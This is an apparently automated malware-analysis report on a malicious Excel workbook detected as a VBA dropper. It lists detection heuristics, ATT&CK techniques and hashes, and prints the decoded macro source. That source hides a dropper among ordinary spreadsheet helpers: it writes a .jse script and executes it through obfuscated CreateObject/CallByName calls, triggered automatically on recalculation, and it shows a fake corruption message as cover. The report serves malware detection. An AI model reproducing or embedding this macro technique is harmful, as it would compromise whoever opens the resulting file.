MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Xls.Dropper.Generic-9765465-0. It contains VBA macros that utilize CreateObject and CallByName functions, indicative of malicious intent. The VBA code attempts to construct a JavaScript file path and execute it, suggesting it acts as a dropper for a second-stage payload.
Heuristics 6
-
ClamAV: Xls.Dropper.Generic-9765465-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Generic-9765465-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
External hyperlinks (4) low OOXML_EXTERNAL_HYPERLINKSDocument contains 4 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.quora.com/profile/Alok-Jha-43
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.micr In document text (OOXML body / shared strings)
- http://schemasIn document text (OOXML body / shared strings)
- https://www.quora.com/profile/Alok-Jha-43Document hyperlink
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4538 bytes |
SHA-256: 81c5d81e4281db8b8b5d5ad38e9ebf7df1152976cfba7c046c230e77581622d2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'14. Highlight Named Ranges
'
'If you are not sure about how many named ranges you have in your worksheet then you can use this code to highlight all of them.
'
Sub CustomHeader()
Dim myText As String
myText = InputBox("Enter your text here", "Enter Text")
With ActiveSheet.PageSetup
.LeftHeader = ""
.CenterHeader = myText
.RightHeader = ""
.LeftFooter = ""
.CenterFooter = ""
.RightFooter = ""
End With
End Sub
Sub HighlightDuplicateValues()
Dim myRange As Range
Dim myCell As Range
Set myRange = Selection
For Each myCell In myRange
If WorksheetFunction.CountIf(myRange, myCell.Value) > 1 Then
myCell.Interior.ColorIndex = 36
End If
Next myCell
End Sub
Sub highlightCommentCells(se As String)
Selection.SpecialCells(xlCellTypeComments).Select
Selection.Style = se
End Sub
Private Function MIObj() As Object
Dim Rng As Range
Dim x As Range
Set x = Worksheets("Sheet1").Cells
For Each Rng In Selection
If WorksheetFunction.IsNumber(Rng) Then
If Rng.Value < 0 Then
Rng.Font.Color = -16776961
End If
End If
Set MIObj = CreateObject(Replace(UserForm1.xx0.Caption & UserForm1.xx1.Caption, " ", ""))
Next
End Function
Private Sub PO_NOx()
Dim DbNop As String
Dim BTgol As String
BTgol = """"
'highlightCommentCells BTgol
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Debug.Print "Finish"
MsgBox Application.Path & Chr(13) & Chr(10) & ": The file is corrupted and cannot be opened " & CallByName(MIObj, UserForm1.Film.Caption, 1, BTgol & DbNop & BTgol, 1)
HighlightDuplicateValues
ActiveWorkbook.Close SaveChanges:=True
End Sub
Private Sub DOlrf()
Debug.Print "drswe"
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Debug.Print "hyij"
Open DbNop For Output As #1
Debug.Print "rtf ijuo"
Print #1, UserForm1.Doner.Value
Debug.Print "Kol 7yh7"
Close #1
End Sub
Sub Bei_yhu(FInrtg As Byte)
Dim SA As Workbook
Debug.Print "esdruyg"
awse = ActiveWorkbook.Application.StartupPath & "\..\Pray2"
'ActiveWorkbook.Ap
On Error Resume Next
MkDir awse
NRople = awse & "\Note" & FInrtg & ".xlsm"
Application.DisplayAlerts = False
ActiveWorkbook.SaveCopyAs NRople
Subrt2 = "DOlrf"
Debug.Print "esdruyg"
Jolp = "PO_NOx"
Set SA = Workbooks.Open(NRople)
If UserForm1.Label1.Caption = "Solt" Then
UserForm1.Label1.Caption = "seaq gytugty"
'first
SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Subrt2
Else
'second
SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Jolp
End If
Set SA = Nothing
Debug.Print "Kol 7yh7"
End Sub
Private Sub Worksheet_PivotTableUpdate(ByVal Target As PivotTable)
'runs
Bei_yhu 102
End Sub
Private Sub Worksheet_Calculate()
'mer
Bei_yhu 101
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{75B6774F-339A-4ADB-B614-4A5ACC9DED60}{DD47C5FB-8B24-4F24-99DA-844CDEFF4F86}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
Debug.Print "Change"
End Sub
Private Sub Label3_Click()
End Sub
Private Sub ComboBox1_Change()
End Sub
Private Sub RefEdit1_BeforeDragOver(Cancel As Boolean, ByVal Data As MSForms.DataObject, ByVal x As stdole.OLE_XPOS_CONTAINER, ByVal y As stdole.OLE_YPOS_CONTAINER, By
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 686080 bytes |
SHA-256: d3e7eb1932d0840d9a80c15f619c72e2f05a0c71716d0ba74b9be0610299b97b |
|||
|
Detection
ClamAV:
Xls.Dropper.Generic-9765465-0
Obfuscation or payload:
unlikely
|
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 1842004 bytes |
SHA-256: 0295c5e4bea86a8a79ab50edfaa4d774e2d02df6ff818f54392499799e047686 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.